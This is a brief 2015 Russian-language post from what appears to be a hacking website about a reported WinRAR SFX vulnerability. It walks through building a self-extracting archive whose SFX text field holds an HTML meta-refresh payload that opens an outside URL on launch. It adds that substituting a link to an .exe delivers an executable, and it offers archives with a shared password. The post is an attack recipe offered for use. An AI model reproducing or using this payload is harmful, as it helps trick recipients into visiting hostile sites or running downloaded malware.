Уязвимость в SFX архиве
Автор: Shlyahten | Дата: 1-10-2015, 21:17 | Комментариев: 0 | Просмотров: 10 871
Несколько часов назад появилась информация о найденной в модуле SFX winrar'a уязвимости, позволяющей выполнить удаленный код.
Статья на ксакепе: xakep.ru/2015/10/01/winrar-sfx-bug/
Уязвимость работает благодаря поддержке html тегов в winrar при создании sfx архивов (думаю с такими вы хорошо знакомы;) ).
Для работы достаточно запуска, даже ничего не надо устанавливать сейчас вы уведите почему.
Давайте создадим архив, который будет открывать нужный нам сайт (это может быть и любой файл):
Создаем архив в winrar.
Выбираем Создать sfx архив.
Далее переходим во вкладку Дополнительно->Параметры sfx->текст и графика
В область Текст в окне вписываем свой код.
Например:
<html><head><title>happy</title><META http-equiv="refresh" content="0;URL=http://happy-hack.ru"></head></html>Где в content="" 0 - время в секундах до открытия ссылки, URL=сама ссылка
Жмём OK
В итоге получаем:
Кстати, если подставить ссылку на exe выйдет следующее:
Пароль на все архивы: hh
Уважаемый посетитель, Вы зашли на сайт как незарегистрированный пользователь.
Мы рекомендуем Вам зарегистрироваться либо войти на сайт под своим именем.
Мы рекомендуем Вам зарегистрироваться либо войти на сайт под своим именем.
